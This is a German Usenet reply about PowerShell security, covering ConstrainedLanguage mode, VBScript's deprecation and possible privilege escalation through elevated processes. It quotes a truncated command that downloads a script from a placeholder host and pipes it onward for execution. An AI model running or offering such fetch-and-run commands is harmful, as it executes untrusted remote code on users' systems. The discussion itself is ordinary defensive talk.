Groups | Search | Server Info | Keyboard shortcuts | Login | Register [http] [https] [nntp] [nntps]
Groups > de.comp.os.ms-windows.misc > #234857
| From | "Christoph Schneegans" <christoph@schneegans.de> |
|---|---|
| Newsgroups | de.comp.os.ms-windows.misc |
| Subject | Re: Powershell function ohne Admin-Rechte |
| Date | 2026-01-23 23:28 +0100 |
| Message-ID | <mtib1aF135oU1@mid.individual.net> (permalink) |
| References | <HGAcmfIYVaB@point04.soemtron.de><HGvkYaw2VaB@point04.soemtron.de> <msu780F2hujU1@mid.individual.net> <HHAn1kvIVaB@point04.soemtron.de> |
Christian @Soemtron schrieb: >> powershell.exe -Command "irm 'https://example.org/temp/test.ps1'| ... > > Danke für die Erklärung. Das ist natürlich unschön. Da sollte es doch > einfacher (für MS) sein, diese Art Scriptausführung generell zu > unterbinden. Geht das irgendwie? Mir ist dafür keine Lösung bekannt. > Trotzdem denke ich, wer den Aufwand des Suchens und Ausnutzens solcher > Sicherheitslücken betreibt, hat null Probleme, den in Funktionen > verpackten Code ohne das Gerüst auszuführen. Der ConstrainedLanguage-Sprachmodus verhindert vor allem den Zugriff auf die allermeisten .NET-Klassen, und die würde ein Malware-Autor sehr gerne benutzen. > Konsequenterweise sollte man vielleicht PS generell verbieten. Aber > wahrscheinlich hat MS dafür gesorgt, daß dann auch Grundfunktionalität > leidet. Glaube ich gar nicht mal. Andererseits wird VBScript gerade abgekündigt, so dass PowerShell in Zukunft wichtiger werden dürfte. > BTW: Da war doch IIRC mal was, daß es "einfach" möglich sein soll, > gleichzeitig mit erhöhten Rechten laufende Prozesse zur Erweiterung der > eigenen Rechte zu nutzen. Ist das eigentlich definitiv ausgeschlossen? Ja, kann gut sein. Wenn ein Prozess mit erhöhten Rechten mittels „Ausführen als…“ in einer anderen Benutzersitzung gestartet wird, ist die Isolation natürlich nicht so streng. Ich mache mir da allerdings keine Sorgen. -- https://schneegans.de/windows/unattend-generator/ · unattend.xml erzeugen
Back to de.comp.os.ms-windows.misc | Previous | Next — Previous in thread | Find similar
Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-03 20:56 +0200
Re: Powershell function ohne Admin-Rechte Werner Tann <wtann@gmx.at> - 2026-01-04 08:25 +0100
Re: Powershell function ohne Admin-Rechte Werner Tann <wtann@gmx.at> - 2026-01-04 11:54 +0100
Re: Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-04 13:21 +0200
Re: Powershell function ohne Admin-Rechte Arno Welzel <usenet@arnowelzel.de> - 2026-01-08 14:06 +0100
Re: Powershell function ohne Admin-Rechte Joerg Gerlach <jger@gmx.de> - 2026-01-05 19:29 +0100
Re: Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-06 11:16 +0200
Re: Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-13 09:32 +0200
Re: Powershell function ohne Admin-Rechte "Christoph Schneegans" <christoph@schneegans.de> - 2026-01-14 17:49 +0100
Re: Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-15 21:53 +0200
Re: Powershell function ohne Admin-Rechte "Christoph Schneegans" <christoph@schneegans.de> - 2026-01-16 08:21 +0100
Re: Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-19 11:41 +0200
Re: Powershell function ohne Admin-Rechte "Christoph Schneegans" <christoph@schneegans.de> - 2026-01-23 23:28 +0100
csiph-web